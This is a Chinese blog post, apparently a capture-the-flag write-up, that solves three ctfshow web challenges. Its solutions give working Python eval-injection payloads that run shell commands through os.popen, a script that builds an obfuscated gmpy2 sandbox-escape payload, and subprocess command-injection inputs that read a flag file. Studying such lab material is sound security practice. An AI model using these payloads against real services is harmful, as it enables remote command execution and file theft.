ctfshow 菜狗杯 算力两题+easyPytHon_P

于 2024-05-01 19:34:36 发布
阅读量54 收藏 3
点赞数 7
分类专栏: 公开赛 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/138165149
版权

算力超群

随便输入,然后抓包发现变量
在这里插入图片描述

/_calculate?number1=5&operator=%2B&number2=5

在这里插入图片描述

一个一个参数挨着试,发现number2没被过滤,就用number2来执行py的命令

_calculate?number1=&operator=&number2=__import__('os').popen('ls /').read()
_calculate?number1=&operator=&number2=__import__('os').popen('cat /f*').read()

算力升级

from flask import *
import os
import re,gmpy2 
import json
#初始化全局变量
app = Flask(__name__)
pattern=re.compile(r'\w+')
@app.route('/', methods=['GET'])
def index():  
    return render_template('index.html')
@app.route('/tiesuanzi', methods=['POST'])
def tiesuanzi():
    code=request.form.get('code')
    for item in pattern.findall(code):#从code里把单词拿出来
        if not re.match(r'\d+$',item):#如果不是数字
            if item not in dir(gmpy2):#逐个和gmpy2库里的函数名比较
               return jsonify({"result":1,"msg":f"你想干什么?{item}不是有效的函数"})
    try:
        result=eval(code)
        return jsonify({"result":0,"msg":f"计算成功,答案是{result}"})
    except:
        return jsonify({"result":1,"msg":f"没有执行成功,请检查你的输入。"})
@app.route('/source', methods=['GET'])
def source():  
    return render_template('source.html')
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=False)

传两个参数tiesuanzi(POST) source (GET)

#已经支持gmpy2了,可以使用gmpy2的函数进行计算,那我们赶快开始吧! 
这个hint,就是用这个来做咯

s="__import__('os').popen('cat /flag').read()"
 
import gmpy2
 
payload="gmpy2.__builtins__['erf'[0]+'div'[2]+'ai'[0]+'lcm'[0]]("
 
for i in s:
        if i not in "/'(). ":
                temp_index=0
                temp_string='x'*20
                for j in dir(gmpy2):
                        if j.find(i)>=0:
                                if len(j)<len(temp_string):
                                        temp_string=j
                                        temp_index=j.find(i)
                payload+=f'\'{temp_string}\'[{temp_index}]+'
        else:
                payload+=f'\"{i}\"+'
 
payload=payload[:-1]+')'
 
print(payload)

gmpy2.__builtins__['erf'[0]+'div'[2]+'ai'[0]+'lcm'[0]]('c_div'[1]+'c_div'[1]+'ai'[1]+'agm'[2]+'cmp'[2]+'cos'[1]+'erf'[1]+'cot'[2]+'c_div'[1]+'c_div'[1]+"("+"'"+'cos'[1]+'cos'[2]+"'"+")"+"."+'cmp'[2]+'cos'[1]+'cmp'[2]+'erf'[0]+'jn'[1]+"("+"'"+'cmp'[0]+'ai'[0]+'cot'[2]+" "+"/"+'erf'[2]+'lcm'[0]+'ai'[0]+'agm'[1]+"'"+")"+"."+'erf'[1]+'erf'[0]+'ai'[0]+'add'[1]+"("+")")

easyPytHon_P

from flask import request
cmd: str = request.form.get('cmd')
param: str = request.form.get('param')
# ------------------------------------- Don't modify ↑ them ↑! But you can write your code ↓
import subprocess, os
if cmd is not None and param is not None:
    try:
        tVar = subprocess.run([cmd[:3], param, __file__], cwd=os.getcwd(), timeout=5)
        print('Done!')
    except subprocess.TimeoutExpired:
        print('Timeout!')
    except:
        print('Error!')
else:
    print('No Flag!')

subprocess.run用来执行命令
[cmd[:3]     切片cmd命令的前三位
param 就是命令参数
__file__不知道什么东西不管

传参的时候被误导了,这里我以为是GET结果是POST

cmd=ls&param=./                 
发现flag.txt
cmd=cat&param=./flag.txt
baozongwi
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-杯-WEB-变量循环取值-我的眼里只有$
03-04
【标】"CTFshow-杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web目,该目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
ctfshow初学msic(新手必刷,杯)
你好
12-04 605
杂项签到、损坏的压缩包、迷之栅栏、你会数数吗、你会异或吗
CTFshow-杯-传说之下(雾)-easyPytHon_P
qq_31415417的博客
02-16 1078
CTFshow-杯-传说之下(雾)-easyPytHon_P
杯-web-easyPytHon_P
qq_47804678的博客
01-09 373
他其实就是一个命令执行,只不过他是FLASK框架下的python环境,我们主要看subprocess.run()函数。subpeocess模块下的run函数可以执行命令,其具体的参数有很多,我们中这里主要有三个:第一个args是最重要的,它就是要执行的命令。那么中就是取cmd中前三个为命令,param为命令参数,_file_是当前文件路径(当param中传入的也是文件路径参数时,命令行会根据这两个路径参数分别执行成两条命令,输出两个结果);点个就是超时时间最大设置为5s。
ctfshow杯 web 无力以及easyPytHon_P
最新发布
2301_81040377的博客
04-24 913
F12发现有一个可疑文件,但是这是真猥琐啊500多行,base64解密。这个是 AES_ECB解密不会解密,MD一个web怎么这么多解密。GET方法传入cmd然后进行反序列化,再进行正则匹配,执行命令。先传GET,然后反序列化再进入函数使得等于小甜甜就有flag。只能是e的整数溢出至于为啥我不知道因为其他的溢出回显是。访问/lib.php?flag=0发现不对。flag=1发现密文。count函数是数GET的传入参数个数的。自己修改命令就能获得flag了。查看源代码发现一半的flag。
ctfshow 新手杯web
qq_53063436的博客
10-08 366
ctfshow 新手杯web部分
12周
m0_74011969的博客
11-27 582
wp
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow 杯 一言既出 wp
arcuied
11-30 321
ctfshow 杯 一言既出 wp
ctfshow新手杯(web)
m0_62422842的博客
10-07 2323
前天ctfshow举办的新手杯,里面的部分web对于我来说还是有必要记录一下的。里面的大师傅都太强了。还有最后一道web,看了官方wp,有种本能的抗拒。这种涉及的知识点超出了我的学习范围。还得继续积累知识,向大师傅们学习。
CTFshow-Misc入门图片篇(一)
xl2655894520的博客
03-12 992
ctf解wp
ctfshow杯wp
m0_62274649的博客
11-17 2374
杯wp
ctfshow-杯-web(一)
qq_47804678的博客
11-30 2647
_REQUEST[c][6][0][7][5][8][0][9][4][4],其中$_REQUEST是以任何一种方式请求都可以,c为数组,$_REQUEST请求中传入的值是取的C数组中ID键为[6][0][7][5][8][0][9][4][4]的值。eval()函数中的还是变量嵌套(刚开始以为只需要传最后一个$_的值就好了,没想到是不停的变量嵌套),注意都到在POST中传入。首先是给$_赋值:_=a,再给$a赋值,a=b······以此类推一共有36个$,需要赋值36次。于是我们用POST形式发包,
ctfshow(杯)
qq_62046696的博客
11-28 5715
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTFshow 2022 杯 WEB WP补充
starttv的博客
11-14 1972
得到源码,分析发现push会将自定义内容md5加密之后作为文件名上传到/plugins/目录上,内容可控。先给number2赋字母,会出现一个报错界面,给number1和operator赋的话会提示错误,应该是这两个参数有过滤,而number2没有。在控制台输入Game回车,把score修改,然后回到游戏点击开始,只要吃掉一个苹果你就会发现分数已经修改成功。分析源码,发现它将文件名拼接到了cmd里,没有进行任何过滤,可以在文件后传入命令。flag=0,发现内容为空,尝试把flag=0改为1,得到。
ctfshow
07-28
- *1* *2* *3* [CTFshow杯-misc-wp(详解 脚本 过程 全)](https://blog.csdn.net/m0_68012373/article/details/128960816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值